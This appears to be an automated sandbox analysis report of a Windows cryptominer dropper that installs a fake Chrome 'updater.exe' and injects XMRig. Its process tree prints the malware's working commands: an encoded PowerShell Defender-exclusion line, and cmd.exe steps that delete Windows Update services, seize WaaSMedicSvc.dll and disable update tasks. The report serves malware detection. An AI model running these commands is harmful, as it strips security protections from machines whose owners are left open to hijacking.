Analysis
-
max time kernel
302s -
max time network
266s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
23-08-2022 22:15
Behavioral task
behavioral1
Sample
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe
Resource
win7-20220812-en
General
-
Target
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe
-
Size
7.0MB
-
MD5
bd239d9eef85d149f36a7fe0bd2ba851
-
SHA1
4bec39f7dde972db05a9d5b632a1270835948939
-
SHA256
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f
-
SHA512
9cb49b81c3e0c98c6e6d9fbde42ddb635ea71e6230ee1ad6f39599ca991b45cd6f7b2c2775d8345bccb8cfb396b6952dbfe45e4531e18c28b2e709fe5424e6d2
-
SSDEEP
196608:Ss1EweUJOIkMdPU+W+RU5eltspYA+QPjBBQWHNGm:Ss1E9UkzM6e4v7obm
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/4588-460-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/4588-462-0x000000014036EAC4-mapping.dmp xmrig behavioral2/memory/4588-463-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/4588-464-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/4588-471-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/4588-472-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 188 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 3540 icacls.exe 4032 takeown.exe 4004 icacls.exe 4804 takeown.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
updater.exe4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4804 takeown.exe 3540 icacls.exe 4032 takeown.exe 4004 icacls.exe -
Processes:
resource yara_rule behavioral2/memory/2068-120-0x0000000000400000-0x0000000001056000-memory.dmp themida behavioral2/memory/2068-121-0x0000000000400000-0x0000000001056000-memory.dmp themida behavioral2/memory/2068-129-0x0000000000400000-0x0000000001056000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/188-262-0x0000000000400000-0x0000000001056000-memory.dmp themida behavioral2/memory/188-263-0x0000000000400000-0x0000000001056000-memory.dmp themida behavioral2/memory/188-265-0x0000000000400000-0x0000000001056000-memory.dmp themida -
Processes:
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exeupdater.exepid process 2068 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe 188 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 2316 set thread context of 4588 2316 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe powershell.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1112 sc.exe 5088 sc.exe 4884 sc.exe 2612 sc.exe 3972 sc.exe 4256 sc.exe 4308 sc.exe 4236 sc.exe 2212 sc.exe 5100 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.EXEconhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4948 reg.exe 4928 reg.exe 3664 reg.exe 4828 reg.exe 4588 reg.exe 4360 reg.exe 4204 reg.exe 4664 reg.exe 2468 reg.exe 5080 reg.exe 3968 reg.exe 2908 reg.exe 2784 reg.exe 4652 reg.exe 1020 reg.exe 4516 reg.exe 4008 reg.exe 2176 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.exepowershell.EXEpowershell.execonhost.exeexplorer.exepid process 2864 powershell.exe 2864 powershell.exe 2864 powershell.exe 2056 conhost.exe 3244 powershell.exe 3244 powershell.exe 3244 powershell.exe 4232 powershell.EXE 4232 powershell.EXE 4232 powershell.EXE 3212 powershell.exe 3212 powershell.exe 3212 powershell.exe 2316 conhost.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe 4588 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 2864 powershell.exe Token: SeIncreaseQuotaPrivilege 2864 powershell.exe Token: SeSecurityPrivilege 2864 powershell.exe Token: SeTakeOwnershipPrivilege 2864 powershell.exe Token: SeLoadDriverPrivilege 2864 powershell.exe Token: SeSystemProfilePrivilege 2864 powershell.exe Token: SeSystemtimePrivilege 2864 powershell.exe Token: SeProfSingleProcessPrivilege 2864 powershell.exe Token: SeIncBasePriorityPrivilege 2864 powershell.exe Token: SeCreatePagefilePrivilege 2864 powershell.exe Token: SeBackupPrivilege 2864 powershell.exe Token: SeRestorePrivilege 2864 powershell.exe Token: SeShutdownPrivilege 2864 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeSystemEnvironmentPrivilege 2864 powershell.exe Token: SeRemoteShutdownPrivilege 2864 powershell.exe Token: SeUndockPrivilege 2864 powershell.exe Token: SeManageVolumePrivilege 2864 powershell.exe Token: 33 2864 powershell.exe Token: 34 2864 powershell.exe Token: 35 2864 powershell.exe Token: 36 2864 powershell.exe Token: SeShutdownPrivilege 3028 powercfg.exe Token: SeCreatePagefilePrivilege 3028 powercfg.exe Token: SeShutdownPrivilege 4452 powercfg.exe Token: SeCreatePagefilePrivilege 4452 powercfg.exe Token: SeShutdownPrivilege 1456 powercfg.exe Token: SeCreatePagefilePrivilege 1456 powercfg.exe Token: SeShutdownPrivilege 4980 powercfg.exe Token: SeCreatePagefilePrivilege 4980 powercfg.exe Token: SeDebugPrivilege 2056 conhost.exe Token: SeTakeOwnershipPrivilege 4804 takeown.exe Token: SeDebugPrivilege 3244 powershell.exe Token: SeIncreaseQuotaPrivilege 3244 powershell.exe Token: SeSecurityPrivilege 3244 powershell.exe Token: SeTakeOwnershipPrivilege 3244 powershell.exe Token: SeLoadDriverPrivilege 3244 powershell.exe Token: SeSystemProfilePrivilege 3244 powershell.exe Token: SeSystemtimePrivilege 3244 powershell.exe Token: SeProfSingleProcessPrivilege 3244 powershell.exe Token: SeIncBasePriorityPrivilege 3244 powershell.exe Token: SeCreatePagefilePrivilege 3244 powershell.exe Token: SeBackupPrivilege 3244 powershell.exe Token: SeRestorePrivilege 3244 powershell.exe Token: SeShutdownPrivilege 3244 powershell.exe Token: SeDebugPrivilege 3244 powershell.exe Token: SeSystemEnvironmentPrivilege 3244 powershell.exe Token: SeRemoteShutdownPrivilege 3244 powershell.exe Token: SeUndockPrivilege 3244 powershell.exe Token: SeManageVolumePrivilege 3244 powershell.exe Token: 33 3244 powershell.exe Token: 34 3244 powershell.exe Token: 35 3244 powershell.exe Token: 36 3244 powershell.exe Token: SeIncreaseQuotaPrivilege 3244 powershell.exe Token: SeSecurityPrivilege 3244 powershell.exe Token: SeTakeOwnershipPrivilege 3244 powershell.exe Token: SeLoadDriverPrivilege 3244 powershell.exe Token: SeSystemProfilePrivilege 3244 powershell.exe Token: SeSystemtimePrivilege 3244 powershell.exe Token: SeProfSingleProcessPrivilege 3244 powershell.exe Token: SeIncBasePriorityPrivilege 3244 powershell.exe Token: SeCreatePagefilePrivilege 3244 powershell.exe Token: SeBackupPrivilege 3244 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.execonhost.execmd.execmd.exedescription pid process target process PID 2068 wrote to memory of 2056 2068 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe conhost.exe PID 2068 wrote to memory of 2056 2068 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe conhost.exe PID 2068 wrote to memory of 2056 2068 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe conhost.exe PID 2056 wrote to memory of 2864 2056 conhost.exe powershell.exe PID 2056 wrote to memory of 2864 2056 conhost.exe powershell.exe PID 2056 wrote to memory of 3432 2056 conhost.exe cmd.exe PID 2056 wrote to memory of 3432 2056 conhost.exe cmd.exe PID 2056 wrote to memory of 1508 2056 conhost.exe cmd.exe PID 2056 wrote to memory of 1508 2056 conhost.exe cmd.exe PID 3432 wrote to memory of 1112 3432 cmd.exe sc.exe PID 3432 wrote to memory of 1112 3432 cmd.exe sc.exe PID 1508 wrote to memory of 3028 1508 cmd.exe powercfg.exe PID 1508 wrote to memory of 3028 1508 cmd.exe powercfg.exe PID 3432 wrote to memory of 5088 3432 cmd.exe sc.exe PID 3432 wrote to memory of 5088 3432 cmd.exe sc.exe PID 3432 wrote to memory of 4256 3432 cmd.exe sc.exe PID 3432 wrote to memory of 4256 3432 cmd.exe sc.exe PID 3432 wrote to memory of 4308 3432 cmd.exe sc.exe PID 3432 wrote to memory of 4308 3432 cmd.exe sc.exe PID 3432 wrote to memory of 4236 3432 cmd.exe sc.exe PID 3432 wrote to memory of 4236 3432 cmd.exe sc.exe PID 3432 wrote to memory of 5080 3432 cmd.exe reg.exe PID 3432 wrote to memory of 5080 3432 cmd.exe reg.exe PID 1508 wrote to memory of 4452 1508 cmd.exe powercfg.exe PID 1508 wrote to memory of 4452 1508 cmd.exe powercfg.exe PID 3432 wrote to memory of 1020 3432 cmd.exe reg.exe PID 3432 wrote to memory of 1020 3432 cmd.exe reg.exe PID 1508 wrote to memory of 1456 1508 cmd.exe powercfg.exe PID 1508 wrote to memory of 1456 1508 cmd.exe powercfg.exe PID 3432 wrote to memory of 4928 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4928 3432 cmd.exe reg.exe PID 1508 wrote to memory of 4980 1508 cmd.exe powercfg.exe PID 1508 wrote to memory of 4980 1508 cmd.exe powercfg.exe PID 3432 wrote to memory of 3664 3432 cmd.exe reg.exe PID 3432 wrote to memory of 3664 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4828 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4828 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4804 3432 cmd.exe takeown.exe PID 3432 wrote to memory of 4804 3432 cmd.exe takeown.exe PID 3432 wrote to memory of 3540 3432 cmd.exe icacls.exe PID 3432 wrote to memory of 3540 3432 cmd.exe icacls.exe PID 2056 wrote to memory of 3244 2056 conhost.exe powershell.exe PID 2056 wrote to memory of 3244 2056 conhost.exe powershell.exe PID 3432 wrote to memory of 4588 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4588 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4516 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4516 3432 cmd.exe reg.exe PID 3432 wrote to memory of 3968 3432 cmd.exe reg.exe PID 3432 wrote to memory of 3968 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4360 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4360 3432 cmd.exe reg.exe PID 3432 wrote to memory of 4328 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 4328 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 4768 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 4768 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 584 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 584 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 512 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 512 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 1008 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 1008 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 500 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 500 3432 cmd.exe schtasks.exe PID 3432 wrote to memory of 4784 3432 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAawBsAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAGoAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBlAG4AegBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAcwBsACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
